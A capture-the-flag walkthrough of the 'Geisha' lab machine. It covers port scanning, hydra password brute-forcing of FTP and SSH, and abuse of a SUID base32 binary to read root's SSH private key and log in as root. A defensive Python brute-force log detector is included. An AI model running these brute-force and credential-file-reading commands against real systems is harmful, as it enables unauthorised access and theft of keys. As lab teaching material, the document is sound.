
Geisha

This is my write-up for Geisha (See original submission) on OffSec Proving Grounds.

This room is a CTF-style room.

I will try to go deep into the technical details of what we do in this room.


1. Enum

  • Let's start up the box and get the IP

Getting the IP

  • Export the IP to the terminal so we can use it easier
export IP=192.168.197.82

## Test to see if the IP is correct
echo $IP
  • Start the port scan
Port Scan
## Create a directory to store the scan results
mkdir nmap

## Start a default nmap scan
nmap -sC -sV -vvv -oN nmap/default_scan $IP

## Start a rustscan for a faster all-port scan
## (rustscan appends the target to the nmap arguments itself, so $IP is not repeated after --)
rustscan -a $IP -- -oN nmap/rustscan
Rustscan result
PORT     STATE SERVICE    REASON
21/tcp   open  ftp        syn-ack
22/tcp   open  ssh        syn-ack
80/tcp   open  http       syn-ack
7080/tcp open  empowerid  syn-ack
7125/tcp open  unknown    syn-ack
8088/tcp open  radan-http syn-ack
9198/tcp open  unknown    syn-ack

2. Foothold

  • Try logging in to FTP as anonymous, but it fails
ftp -p $IP
Connected to 192.168.197.82.
220 (vsFTPd 3.0.3)
Name (192.168.197.82:minhnq): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> exit
221 Goodbye.
  • We can try to brute-force the FTP password; since this machine is called geisha, I would assume that one of the users is geisha
FTP Brute Force
hydra -l geisha -P /usr/share/wordlists/rockyou.txt -t 32 $IP ftp
## Result
[21][ftp] host: 192.168.197.82 login: geisha password: letmein
  • We can now log in to FTP as user geisha
ftp -p $IP
Connected to 192.168.197.82.
220 (vsFTPd 3.0.3)
Name (192.168.197.82:minhnq): geisha
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (192,168,197,82,213,164).
150 Here comes the directory listing.
drwxr-xr-x 2 1000 1000 4096 Aug 20 2020 .
drwxr-xr-x 3 0 0 4096 May 03 2020 ..
-rw-r--r-- 1 1000 1000 220 May 03 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3526 May 03 2020 .bashrc
-rw-r--r-- 1 1000 1000 807 May 03 2020 .profile
-rw-r--r-- 1 1000 1000 33 Dec 05 22:06 local.txt
226 Directory send OK.
ftp> pwd
257 "/home/geisha" is the current directory
  • Since we can brute-force the FTP service, I wonder if we can also brute-force SSH? Let's try
hydra -l geisha -P /usr/share/wordlists/rockyou.txt -t 32 $IP ssh
## Result
[22][ssh] host: 192.168.197.82 login: geisha password: letmein
  • Looks like the user geisha has the same password for SSH as for FTP
sshpass -p letmein ssh geisha@$IP
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
geisha@geisha:~$
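The hydra runs above leave a burst of failed logins in the target's auth log, which is exactly what a defender should alert on. As an added example (not part of the original write-up), here is a small Python detector that flags any source exceeding a failure threshold inside a sliding window and records whether a successful login followed, the classic sign of a brute force that worked. The log lines are constructed, and the sshd message format and the year 2020 (syslog timestamps carry no year) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the shape sshd writes to /var/log/auth.log.
# Hostnames, IPs and timestamps are made up for this example.
SAMPLE_AUTH_LOG = """\
Dec  5 22:01:01 geisha sshd[1201]: Failed password for geisha from 192.168.197.50 port 40001 ssh2
Dec  5 22:01:01 geisha sshd[1202]: Failed password for geisha from 192.168.197.50 port 40002 ssh2
Dec  5 22:01:02 geisha sshd[1203]: Failed password for geisha from 192.168.197.50 port 40003 ssh2
Dec  5 22:01:02 geisha sshd[1204]: Failed password for geisha from 192.168.197.50 port 40004 ssh2
Dec  5 22:01:03 geisha sshd[1205]: Failed password for geisha from 192.168.197.50 port 40005 ssh2
Dec  5 22:01:03 geisha sshd[1206]: Accepted password for geisha from 192.168.197.50 port 40006 ssh2
Dec  5 22:30:00 geisha sshd[1300]: Failed password for root from 10.0.0.7 port 51000 ssh2
Dec  5 22:45:00 geisha sshd[1301]: Accepted publickey for root from 10.0.0.7 port 51001 ssh2
"""

# Assumed sshd line format: "<syslog ts> <host> sshd[pid]: Failed|Accepted <method> for [invalid user] <user> from <src> port <n>"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def parse(lines, year=2020):
    """Yield (timestamp, source, user, failed) tuples for lines that look like sshd auth events."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["src"], m["user"], m["result"] == "Failed"

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {src: {"failures": peak failures inside the window, "success_after": bool}}
    for every source that reached `threshold` failed logins within `window_s` seconds."""
    alerts = {}
    recent = defaultdict(list)  # src -> timestamps of failures still inside the window
    for ts, src, _user, failed in parse(lines):
        if failed:
            recent[src].append(ts)
            recent[src] = [t for t in recent[src] if (ts - t).total_seconds() <= window_s]
            if len(recent[src]) >= threshold:
                entry = alerts.setdefault(src, {"failures": 0, "success_after": False})
                entry["failures"] = max(entry["failures"], len(recent[src]))
        elif src in alerts:
            # a successful login from a source already flagged: the brute force likely succeeded
            alerts[src]["success_after"] = True
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()))
```

The single root failure at 22:30 does not trip the default threshold, so only the bursty source is reported; lowering `threshold` makes the detector noisier but catches slower, throttled attempts.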

3. PrivEsc

  • Looking for all root-owned files with the SUID bit set
find / -uid 0 -perm -4000 -type f 2>/dev/null

/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/base32
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount
  • Since base32 is SUID root, we can use it to read files that we are not supposed to be able to read.
Get the root user's id_rsa
base32 /root/.ssh/id_rsa | base32 -d

-----BEGIN RSA PRIVATE KEY-----
[REDACTED]
-----END RSA PRIVATE KEY-----
  • Then we can use the id_rsa to log in as the root user of the machine
ssh -i id_rsa_root root@$IP

Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@geisha:~#
Correct permission

Remember to give the id_rsa file the correct permission of 600, otherwise ssh refuses to use it.

Getting the flags
cat /root/proof.txt /home/geisha/local.txt
[REDACTED]
[REDACTED]